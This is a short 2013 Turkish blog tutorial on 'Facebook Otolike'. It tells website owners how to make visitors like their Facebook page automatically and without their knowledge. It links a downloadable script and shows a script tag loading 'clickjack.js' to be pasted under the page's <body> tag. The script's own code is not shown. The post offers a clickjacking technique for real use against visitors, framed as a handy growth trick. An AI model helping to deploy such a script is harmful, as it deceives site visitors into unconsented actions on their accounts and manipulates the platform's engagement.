Malatya Forum

www.f5blog.org

Facebook Otolike Otomatik Sayfa Beğendirme 2013

22 Mart 2013 Cuma

print this page
send email
faceotolike Facebook Otolike Otomatik Sayfa Beğendirme
Facebook sayfalarınızın otomatik beğenilmesini istermisiniz ? O zaman dogrukonuya girdiniz. Şimdi size anlatacağım yöntem ile siz hiçbişey yapmasanız bile facebook sayfanız otomatik olarak beğenilecektir. Tabi bunun için sizin de bir sayfanız ve kodu ekleyebileceğiniz bir web siteniz olması gerekiyor. Yani web sitesine ekleyeceğiniz kod ile web sitenize girenler otomatik olarak facebook sayfanızıda beğeniyor. Web sitenizin hiti ne kadar yüksek ise o kadar hit sağlayabilirsiniz.Örneğin günlük hitiniz 500 ise bu program sayesinde sayfanıza günde 300 kişi çekebilirsiniz tabi bu minumum bir miktardır. Eğer sitenizi açan kişinin o anda facebook hesabı açık değilse sitenize girdiğinde facebook hesabına girmesini isteyecektir buda dezavantajı ve sitenizin kullanımını birazcık zorlaştıracaktır:)

Şimdi gelelim FACEBOOK OTOLİKE NASIL YAPILIR

İlk başta bu kodu yani .js dosyasndan oluşan kodu bilgisayarınıza indirin. : İNDİR
Daha sonra bu .js dosyasını metin belgesi , wordpad gibi programlarla açıp “siteadresiniz” yazan yere kendi facebook sayfa adresinizi yazın.
Son olarak ise sitenizde <body> tag ‘ın hemen altına
< script src=”http://www.siteniz.com/clickjack.js”></script>
kodunu yazın .
İşte işlemimiz bitti. Artık web sitenize girenler otomatik olarak sayfanızıda beğenecektir denemeye değer güzel bir yöntem yakında Twitter otolike’ıda anlatacağım sizlere. şimdilik bu kadar hadi adiyoss..

0 yorum:

Yorum Gönder